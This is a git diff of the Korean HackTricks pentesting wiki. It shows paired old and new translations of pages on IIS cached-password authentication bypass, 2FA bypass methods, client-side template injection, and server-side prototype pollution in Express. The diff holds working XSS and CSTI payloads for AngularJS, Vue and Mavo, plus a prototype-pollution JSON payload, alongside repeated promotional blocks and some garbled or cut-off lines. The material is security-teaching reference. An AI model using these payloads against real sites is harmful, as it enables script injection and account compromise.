이 공격은 이 [**기술 문서**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19)에서 작동했습니다.
## 캐시된 암호를 사용한 IIS 인증 우회 (CVE-2022-30209) <a href="#id-3-iis-authentication-bypass" id="id-3-iis-authentication-bypass"></a>
[전체 보고서 여기에서](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html): 코드에서의 버그로 인해 **사용자가 제공한 암호를 제대로 확인하지 않았기 때문에**, 이미 **캐시에 있는 키에 해당하는 암호 해시가 일치하는 공격자는 해당 사용자로 로그인할 수 있습니다.**
[전체 보고서 여기에서](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html): 코드에서 **사용자가 제공한 암호를 제대로 확인하지 않았기 때문에**, 이미 **캐시에 있는 키에 해당하는 암호 해시를 가진 공격자**는 해당 사용자로서 로그인할 수 있게 될 것입니다.
```python
# script for sanity check
> type test.py
@ -284,13 +284,13 @@ HTTP/1.1 401 Unauthorized
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 200 OK
```
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**되었는지 확인하는 **무료** 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 확인할 수 있는 **무료** 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난당한 악성 소프트웨어로 인한 계정 탈취와 랜섬웨어 공격을 막는 것입니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로 인한 계정 탈취와 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 방문하여 **무료**로 엔진을 시도해 볼 수 있습니다:
@ -298,14 +298,14 @@ WhiteIntel의 주요 목표는 정보를 도난당한 악성 소프트웨어로
<details>
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**를 통해 제로부터 AWS 해킹을 전문가로 배우세요!</strong></summary>
<summary><strong>제로부터 영웅이 될 때까지 AWS 해킹을 배우세요</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks를 지원하는 다른 방법:
* **HackTricks에 귀사를 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구입하세요
* **HackTricks에하의 회사를 광고하거나 PDF로 다운로드하려면** [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왹**](https://peass.creator-spring.com)을 구입하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 저희의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* 💬 [**디스코드 그룹**](https://discord.gg/hRep4RUj7f)나 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**를 팔로우**하세요.
* **HackTricks****HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
* **💬 [**디스코드 그룹**](https://discord.gg/hRep4RUj7f)에 가입하거나 [**텔레그램 그룹**](https://t.me/peass)에 가입하거나** 트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**를 팔로우하세요.**
* **HackTricks****HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 귀하의 해킹 기술을 공유하세요.
</details>

View file

@ -2,27 +2,27 @@
<details>
<summary><strong>htARTE (HackTricks AWS Red Team 전문가)로부터 AWS 해킹을 처음부터 전문가까지 배우세요</strong></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 **제로**부터 **히어로**까지 AWS 해킹을 배우세요!</summary>
HackTricks를 지원하는 다른 방법:
* **회사가 HackTricks에 광고되길 원하거나 HackTricks를 PDF로 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* **회사가 HackTricks에 광고**되길 원하거나 **PDF로 HackTricks 다운로드**하려면 [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **Discord 그룹**에 **가입**하세요 💬(https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 가입하거나 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)를 **팔로우**하세요.
* **HackTricks****HackTricks Cloud** github 저장소로 **PR 제출**하여 해킹 트릭을 **공유**하세요.
* **Discord 그룹**에 **가입**하거나 [**텔레그램 그룹**](https://t.me/peass)에 가입하거나 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)를 **팔로우**하세요.
* **HackTricks****HackTricks Cloud** github 저장소로 **PR 제출**을 통해 당신의 해킹 기술을 공유하세요.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 고객이 **도난당한 악성 소프트웨어**에 의해 **침해**를 받았는지 무료로 확인할 수 있는 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 통해 **무료**로 제공되는 검색 엔진으로, 회사나 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
WhiteIntel의 주요 목표는 정보를 도난당한 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 확인하고 **무료**로 엔진을 시해 볼 수 있습니다:
그들의 웹사이트를 확인하고 **무료**로 엔진을 시해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
@ -32,7 +32,7 @@ WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한
### **직접 엔드포인트 액세스**
2FA를 우회하려면 경로를 알고 직접 해당 엔드포인트에 액세스하는 것이 중요합니다. 실패할 경우 **Referrer 헤더**를 변경하여 2FA 확인 페이지에서의 탐색을 모방할 수 있습니다.
2FA를 우회하려면 경로를 알고 직접 해당 엔드포인트에 액세스해야 합니다. 실패할 경우 **Referrer 헤더**를 변경하여 2FA 확인 페이지에서의 탐색을 모방해야 합니다.
### **토큰 재사용**
@ -56,7 +56,7 @@ WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한
### **비밀번호 재설정 메커니즘**
비밀번호 재설정 기능을 조사하여 동일한 링크를 사용하여 여러 번 재설정을 허용하는지 확인하는 것이 중요합니다. 새로 재설정된 자격 증명으로 로그인하면 2FA를 우회할 수 있습니다.
비밀번호 재설정 기능을 조사하여 재설정 후 사용자를 애플리케이션에 로그인시키는 데 사용되는 링크가 동일한 링크를 여러 번 사용할 수 있는지 확인하는 것이 중요합니다. 새로 재설정된 자격 증명으로 로그인하면 2FA를 우회할 수 있습니다.
### **OAuth 플랫폼 침해**
@ -66,11 +66,11 @@ WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한
#### **속도 제한 부재**
코드 시도 횟수에 대한 제한이 없으면 무차별 대입 공격이 가능하지만 잠재적인 음성 속도 제한을 고려해야 합니다.
코드 시도 횟수에 대한 제한이 없으면 무차별 대입 공격이 가능하지만 잠재적인 은폐된 속도 제한을 고려해야 합니다.
#### **느린 무차별 대입**
전반적인 속도 제한이 존재하는 경우 느린 무차별 대입 공격이 가능합니다.
전반적인 속도 제한이 는 경우 느린 무차별 대입 공격이 가능합니다.
#### **코드 재전송 제한 재설정**
@ -86,19 +86,19 @@ WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한
#### **SMS 코드 재전송 비용**
SMS를 통한 코드 재전송이 회사에 비용을 발생시키지만 2FA를 우회하지는 않습니다.
SMS를 통해 코드를 반복해서 재전송하면 회사에 비용이 발생하지만 2FA를 우회하지는 않습니다.
#### **무한 OTP 재생성**
간단한 코드를 재시도하여 소수의 코드 집합을 사용하여 무한 OTP 생성을 통해 무차별 대입이 가능합니다.
간단한 코드를 재시도하여 소수의 코드 집합을 통해 무차별 대입을 허용하는 끊임없는 OTP 생성이 가능합니다.
### **경쟁 조건 악용**
### **레이스 컨디션 악용**
2FA 우회를 위해 경쟁 조건을 악용하는 방법은 특정 문서에서 찾을 수 있습니다.
2FA 우회를 위해 레이스 컨디션을 악용하는 방법은 특정 문서에서 찾을 수 있습니다.
### **CSRF/Clickjacking 취약점**
2FA를 비활성화하기 위해 CSRF 또는 Clickjacking 취약점을 탐색하는 것은 유효한 전략입니다.
2FA를 비활성화하기 위해 CSRF 또는 Clickjacking 취약점을 탐색하는 것은 실행 가능한 전략입니다.
### **"나를 기억해" 기능 악용**
@ -122,7 +122,7 @@ SMS를 통한 코드 재전송이 회사에 비용을 발생시키지만 2FA를
### **이전 세션 처리**
2FA 활성화 시 기존 세션을 종료하여 침해된 세션으로부터의 무단 액세스를 방지합니다.
2FA 활성화 시 기존 세션을 종료하여 침해된 세션으로부터의 무단 액세스로부터 계정을 보호합니다.
### **백업 코드와의 액세스 제어 결함**
@ -130,7 +130,7 @@ SMS를 통한 코드 재전송이 회사에 비용을 발생시키지만 2FA를
### **2FA 페이지의 정보 노출**
2FA 확인 페이지에서 민감한 정보(예: 전화번호)가 노출되는 것은 문제입니다.
2FA 확인 페이지에서 (예: 전화번호)와 같은 민감한 정보가 노출되는 것은 문제입니다.
### **비밀번호 재설정으로 2FA 비활성화**
@ -138,9 +138,21 @@ SMS를 통한 코드 재전송이 회사에 비용을 발생시키지만 2FA를
### **속임수 요청**
속임수 요청을 활용하여 무차별 대입 시도를 혼란스럽게 하거나 속도 제한 메커니즘을 오도하여 우회 전략에 또 다른 층을 추가할 수 있습니다. 이러한 요청을 작성하려면 애플리케이션의 보안 조치 및 속도 제한 행동에 대한 세심한 이해가 필요합니다.
속임수 요청을 활용하여 무차별 대입 시도를 혼란스럽게 하거나 속도 제한 메커니즘을 오도하는 것은 우회 전략에 추가적인 층을 더합니다. 이러한 요청을 작성하려면 애플리케이션의 보안 조치와 속도 제한 행동에 대한 세심한 이해가 필요합니다.
## 참고 자료
* [https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35](https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/%22https:/medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35%22/README.md)
* [https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718](https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718)
### [WhiteIntel](https://whiteintel.io)
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 통해 **무료**로 제공되는 검색 엔진으로, 회사나 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난당한 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 확인하고 **무료**로 엔진을 시도해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}

View file

@ -1,26 +1,26 @@
<details>
<summary><strong>htARTE (HackTricks AWS Red Team 전문가)로부터 제로에서 영웅까지 AWS 해킹 배우기</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>htARTE (HackTricks AWS Red Team 전문가)로부터 AWS 해킹을 제로부터 전문가까지 배우세요</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks를 지원하는 다른 방법:
* **회사가 HackTricks에 광고되길 원하거나 HackTricks를 PDF로 다운로드하길 원한다면** [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* **회사가 HackTricks에 광고되길 원하거나 HackTricks를 PDF로 다운로드**하고 싶다면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [**디스코드 그룹**](https://discord.gg/hRep4RUj7f)에 가입하거나 [**텔레그램 그룹**](https://t.me/peass)에 가입하거나** 트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)를 팔로우하세요**.
* **해킹 트릭을 공유하려면** [**HackTricks**](https://github.com/carlospolop/hacktricks) 및 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 저장소에 PR을 제출하세요.
* **💬 [**Discord 그룹**](https://discord.gg/hRep4RUj7f)에 가입하거나 [**텔레그램 그룹**](https://t.me/peass)에 가입하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)를 **팔로우**하세요.
* **HackTricks** 및 **HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보 도난 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 확인하고 엔진을 **무료로** 시험해 볼 수 있습니다:
그들의 웹사이트를 확인하고 **무료**로 엔진을 시험해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
@ -28,9 +28,9 @@ WhiteIntel의 주요 목표는 정보 도난 악성 코드로 인한 계정 탈
# 요약
이는 **서버 측 템플릿 인젝션**과 유사하지만 **클라이언트**에서 발생합니다. **SSTI**는 원격 서버에서 코드를 **실행**할 수 있게 해주지만, **CSTI**는 피해자의 브라우저에서 **임의의 JavaScript** 코드를 실행할 수 있게 합니다.
이는 **서버 측 템플릿 인젝션**과 유사하지만 **클라이언트**에서 발생합니다. **SSTI**는 원격 서버에서 코드를 **실행**할 수 있게 해주지만, **CSTI**는 피해자의 브라우저에서 **임의의 JavaScript 코드를 실행**할 수 있게 해줍니다.
이 취약점을 **테스트**하는 방법은 **SSTI**의 경우와 매우 **유사**합니다. 해석기는 **템플릿**을 기대하고 실행할 것입니다. 예를 들어, `{{ 7-7 }}`와 같은 페이로드로, 앱이 **취약**하다면 `0`을 볼 수 있고, 그렇지 않으면 원본인 `{{ 7-7 }}`을 볼 수 있습니다.
이 취약점에 대한 **테스트**는 **SSTI**의 경우와 매우 **유사**합니다. 해석기는 **템플릿**을 기대하고 실행할 것입니다. 예를 들어, `{{ 7-7 }}`와 같은 payload로, 앱이 **취약**하다면 `0`을 볼 수 있고, 그렇지 않으면 원본인 `{{ 7-7 }}`을 볼 수 있습니다.
# AngularJS
@ -45,15 +45,15 @@ AngularJS는 HTML과 상호 작용하는 널리 사용되는 JavaScript 프레
<!-- Google Research - AngularJS -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
```
매우 **기본적인 온라인 예제**로 **AngularJS** 취약점을 찾을 수 있습니다. [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) 및 **[Burp Suite Academy](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression)**에서 확인할 수 있습니다.
다음은 AngularJS의 취약점에 대한 매우 기본적인 온라인 예제를 찾을 수 있습니다. [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) 및 **[Burp Suite Academy](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression)**에서 확인할 수 있습니다.
{% hint style="danger" %}
[**Angular 1.6에서 샌드박스가 제거**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html#:\~:text=The%20Angular%20expression%20sandbox%20will,smaller%20and%20easier%20to%20maintain.\&text=Removing%20the%20expression%20sandbox%20does,surface%20of%20Angular%201%20applications.)되 이 버전부터 `{{constructor.constructor('alert(1)')()}}` 또는 `<input ng-focus=$event.view.alert('XSS')>`와 같은 페이로드가 작동해야 합니다.
[**Angular 1.6에서 샌드박스가 제거**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html#:\~:text=The%20Angular%20expression%20sandbox%20will,smaller%20and%20easier%20to%20maintain.\&text=Removing%20the%20expression%20sandbox%20does,surface%20of%20Angular%201%20applications.)되었으므로 이 버전부터 `{{constructor.constructor('alert(1)')()}}` 또는 `<input ng-focus=$event.view.alert('XSS')>`와 같은 페이로드가 작동해야 합니다.
{% endhint %}
# VueJS
[https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh/)에서 **취약한 Vue** 구현을 찾을 수 있습니다.\
[https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)에서 **취약한 Vue** 구현을 찾을 수 있습니다.\
작동하는 페이로드: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor\(%27alert\(%22foo%22\)%27\)\(\)%7D%7D)
그리고 취약한 예제의 **소스 코드**는 여기에서 확인할 수 있습니다: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)
@ -63,11 +63,11 @@ AngularJS는 HTML과 상호 작용하는 널리 사용되는 JavaScript 프레
```
## **V3**
VUE에서 CSTI에 대한 매우 좋은 포스트를 [여기](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)에서 찾을 수 있습니다.
VUE에서 CSTI에 대한 매우 좋은 포스트를 찾을 수 있습니다. [https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
```
{{_openBlock.constructor('alert(1)')()}}
```
크레딧: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
신용: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
## **V2**
```
@ -75,7 +75,7 @@ VUE에서 CSTI에 대한 매우 좋은 포스트를 [여기](https://portswigger
```
Credit: [Mario Heiderich](https://twitter.com/cure53berlin)
**더 많은 VUE payloads를 확인하세요** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected)
**더 많은 VUE payloads를 확인하려면** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected)
# Mavo
@ -93,34 +93,34 @@ javascript:alert(1)%252f%252f..%252fcss-images
<a href=[javascript&':alert(1)']>test</a>
[self.alert(1)mod1]
```
**더 많은 페이로드** [**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)
**더 많은 페이로드** [**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)
# **무차별 대입 탐지 목록**
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 그 고객이 **도난당한 악성 소프트웨어**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, 회사나 그 고객이 **도난당한 악성 코드**에 의해 **침해**당했는지 무료 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격에 대항하는 것입니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격에 대항하는 것입니다.
그들의 웹사이트를 방문하여 엔진을 **무료로** 시도해 볼 수 있습니다:
그들의 웹사이트를 확인하고 **무료**로 엔진을 시도해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>제로부터 영웅이 될 때까지 AWS 해킹 배우기</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>제로부터 AWS 해킹을 전문가로 배우세요</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks를 지원하는 다른 방법:
* **HackTricks에 귀하의 회사를 광고하거나 PDF로 다운로드하려면** [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* **HackTricks에 귀사를 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구입하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 저희의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**를 팔로우**하세요.
* **HackTricks****HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **귀하의 해킹 요령을 공유**하세요.
* **💬 [**디스코드 그룹**](https://discord.gg/hRep4RUj7f)에 가입하거나 [**텔레그램 그룹**](https://t.me/peass)에 가입하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**를 팔로우하세요.**
* **HackTricks 및 HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 트릭을 공유하세요.**
</details>

View file

@ -2,27 +2,27 @@
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)를 통해 제로에서 히어로까지 AWS 해킹 배우기</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)를 통해 제로부터 히어로까지 AWS 해킹을 배우세요</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks를 지원하는 다른 방법:
* **회사가 HackTricks에 광고되길 원하거나** **PDF로 HackTricks 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* **회사가 HackTricks에 광고되길 원하거나** **PDF 형식의 HackTricks를 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**를 팔로우**하세요.
* **해킹 트릭을 공유하려면** [**HackTricks**](https://github.com/carlospolop/hacktricks) 및 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) 깃허브 저장소에 PR을 제출하세요.
* **💬 [**디스코드 그룹**](https://discord.gg/hRep4RUj7f)에 가입하거나 [**텔레그램 그룹**](https://t.me/peass)에 가입하거나** **트위터** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**를 팔로우하세요**.
* **해킹 트릭을 공유하려면 PR을 제출하여** [**HackTricks**](https://github.com/carlospolop/hacktricks) **** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **깃허브 저장소에 기여하세요**.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, **스틸러 악성 코드**에 의해 회사나 고객이 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 확인하고 **무료**로 엔진을 시험해 볼 수 있습니다:
그들의 웹사이트를 방문하여 엔진을 **무료로** 시험해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
@ -30,11 +30,11 @@ WhiteIntel의 주요 목표는 정보를 도난하는 악성 코드로 인한
## XSS 응답 제공
**자세한 내용은 [원본 연구를 참조하세요](https://portswigger.net/research/server-side-prototype-pollution)**
**자세한 내용은 [원본 연구를 참조하세요](https://portswigger.net/research/server-side-prototype-pollution)**
### JSON 콘텐츠 유형을 HTML로 변경
**JSON 콘텐츠 유형 응답**을 사용하고 JSON을 반영하는 익스프레스 앱에서:
**JSON 콘텐츠 유형 응답**을 사용하는 익스프레스 앱에서 JSON을 반영하는 경우:
```javascript
app.use(bodyParser.json({type: 'application/json'}));
app.post('/', function(req, res){
@ -46,7 +46,7 @@ res.send(req.body);
```json
{"__proto__":{"_body":true,"body":"<script>evil()"}}
```
**`body`** 및 **`_body`** 속성을 **오염**시킴으로써 **Express가 HTML 콘텐츠 유형을 제공**하고 **`_body`** 속성을 반영하여 저장된 XSS를 유발할 수 있습니다.
**`body`** 및 **`_body`** 속성을 **오염**으로써 **Express가 HTML 콘텐츠 유형을 제공**하고 **`_body`** 속성을 반영하여 저장된 XSS를 유발할 수 있습니다.
### UTF7 렌더링
@ -93,7 +93,7 @@ Express가 **UTF-7 콘텐츠를 렌더링하도록** 할 수 있습니다:
```
### 오류
원시 값인 문자열과 같은 것으로 프로토타입을 할당하면 **프로토타입은 객체여야 하므로 no-op 작업이 생성**됩니다. `Object.prototype`에 프로토타입 객체를 할당하려고 하면 이렇게 하면 **예외가 발생**합니다. 이 두 가지 동작을 사용하여 **프로토타입 오염이 성공적으로 감지되었는지 확인**할 수 있습니다:
원시 값인 문자열과 같은 것으로 프로토타입을 할당하면 **프로토타입은 객체여야 하므로 no-op 작업이 생성**됩니다. `Object.prototype` 자체에 프로토타입 객체를 할당하려고 시도하면 **예외가 발생**합니다. 이 두 가지 동작을 사용하여 **프로토타입 오염이 성공적으로 감지되었는지 확인**할 수 있습니다:
```javascript
({}).__proto__.__proto__={}//throws type exception
({}).__proto__.__proto__="x"//no-op does not throw exception
@ -104,7 +104,7 @@ Express가 **UTF-7 콘텐츠를 렌더링하도록** 할 수 있습니다:
```json
{"unusualName":"value","__proto__":"test"}
```
또한 Lodash와 같은 라이브러리를 사용하는 시나리오에서는 프로토타입 오염(PP)을 통해 속성을 설정하고 객체 내부에 직접 설정하는 것이 다른 진단 접근 방식을 제공합니다. 응답에서 이러한 속성이 누락된 경우, Lodash가 병합하기 전에 대상 객체에서 속성의 존재 여부를 확인하고 있을 시사합니다:
